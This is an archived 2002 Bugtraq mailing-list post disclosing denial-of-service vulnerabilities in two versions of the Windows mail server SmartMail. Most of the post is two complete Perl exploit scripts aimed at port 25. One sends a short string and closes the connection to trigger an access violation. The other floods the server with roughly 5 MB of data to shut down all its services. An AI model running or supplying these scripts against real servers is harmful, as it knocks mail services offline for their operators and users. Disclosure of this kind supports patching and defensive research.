[27660] in bugtraq
SmartMail server DOS
daemon@ATHENA.MIT.EDU (securma massine)
Thu Oct 31 12:44:16 2002
From: securma massine <securma@caramail.com>
To: bugtraq@securityfocus.com
Message-ID: <1036071268016294@caramail.com>
Mime-Version: 1.0
Date: Thu, 31 Oct 2002 14:34:28 GMT+1
Content-Type: multipart/mixed; boundary="=_NextPart_Caramail_0162941036071268_ID"
--=_NextPart_Caramail_0162941036071268_ID
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
hi
SmartMail Server ( http://www.virtualzone.de/smartmail/)is
a full featured E-Mail Server. It can be
run on any 32Bit compatible Microsoft Windows machine and
complies with the standards of SMTP, POP3 and HTTP
(Webinterface).
SmartMail proposes two version of SmartMail server, I found
that two versions were vulnerable has an attack DOS
1- SmartMail Server 2.0 Interim Build 83: the closing of
connection during sends dated causes one is
necessary "Access violatio at address 0046CBCC i
module 'smartsvr.exe' write of address 76756f4e " that is
exactly the same vulnerability which I have decouvert
concerning popwerft and the exploit has the same effect on
the two softwares
expoit :
#!/usr/bin/perl -w
# greetz: marocit and #crack.fr (christal)
# securma@caramail.com
use Socket;
if (not $ARGV[0]) {
print qq~
Usage: sm.pl <host>
~;
exit;}
$ip=3D$ARGV[0];
print "SmartMail server 2.0 DoS\n\n";
print "Sending Exploit Code to host: " . $ip . "\n\n";
sendexplt("MASSINE");
sub sendexplt {
my ($pstr)=3D@_;
$target=3D inet_aton($ip) || die("inet_aton
problems");
socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')
||0) ||
die("Socket problems\n");
if(connect(S,pack "SnA4x8",2,25,$target)){
select(S);
$|=3D1;
print $pstr;
sleep 3;
close(S);
} else { die("Can't connect...\n"); }
}
2-SmartMail Server 1.0 BETA 10 :sends it 5MG of dated with
port 25 or 110 causes the shutdown of all the services
(pop/smtp/webinterface)
exploit:
#!/usr/bin/perl -w
# tool smartdos.pl
# securma@caramail.com
# Greetz: marocit and #crack.fr (specialement christal.)
#
use IO::Socket;
if ($#ARGV<0)
{
print "\n write the target IP!\n\n";
exit;
}
$buffer =3D "A"x 5099999 ;
$connect =3D IO::Socket::INET ->new (Proto=3D>"tcp",
PeerAddr=3D> "$ARGV[0]",
PeerPort=3D>"25"); unless ($connect) { die "cant connect $ARGV
[0]" }
print $connect "$buffer";
print "\nsending exploit......\n\n";
securma@caramail.com
_________________________________________________________
Gagne une PS2 ! Envoie un SMS avec le code PS au 61166
(0,35€ Hors co=FBt du SMS)
--=_NextPart_Caramail_0162941036071268_ID--
